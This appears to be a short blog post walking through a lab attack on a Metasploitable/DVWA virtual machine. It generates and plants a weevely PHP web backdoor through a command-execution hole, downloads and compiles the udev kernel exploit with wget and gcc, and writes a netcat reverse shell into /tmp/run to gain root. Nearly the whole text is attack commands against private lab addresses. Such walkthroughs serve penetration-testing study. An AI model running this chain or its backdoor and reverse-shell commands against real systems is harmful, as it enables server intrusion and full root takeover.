root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /var/www/door.txt -p testing
then using command execution vulnerability of dvwa to download the backdoor.
after that, using weevly to access the backdoor.
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://192.168.56.101/dvwa/door.php -p testing
until here, we can see that we just on user www-data, so to gaining the root we have to exploit the kernel.
here i will exploit the udev, because udev is the device manager for the Linux kernel.
for more information about udev, please visit here or here
search udev on exploit db
we can see the usage that we have to pass the PID by - 1 of udevd. then the exploit will execute /tmp/run as root.
now copy the exploit to /var/www/
after that, download the exploit to system target
[www-data@metasploitable /var/www/dvwa] wget http://192.168.56.1/8572.c
then, compaile it and i wiil use reverse shell via netcat.
[www-data@metasploitable /var/www/dvwa] gcc -o tes 8572.c
[www-data@metasploitable /var/www/dvwa] echo '/bin/netcat -e /bin/sh 192.168.56.1 1234' >> /tmp/run
we can see that the udevd have been running on PID 2290 and run as root.
then running the nc and listen on port 1234 (on our bt)
root@bt:~# nc -lvp 1234
after that execute the exploit by type (on terget)
[www-data@metasploitable /var/www/dvwa] ./tes 2289 (2289=PID 2290-1)
so we can see the id, we are on root.
No comments:
Post a Comment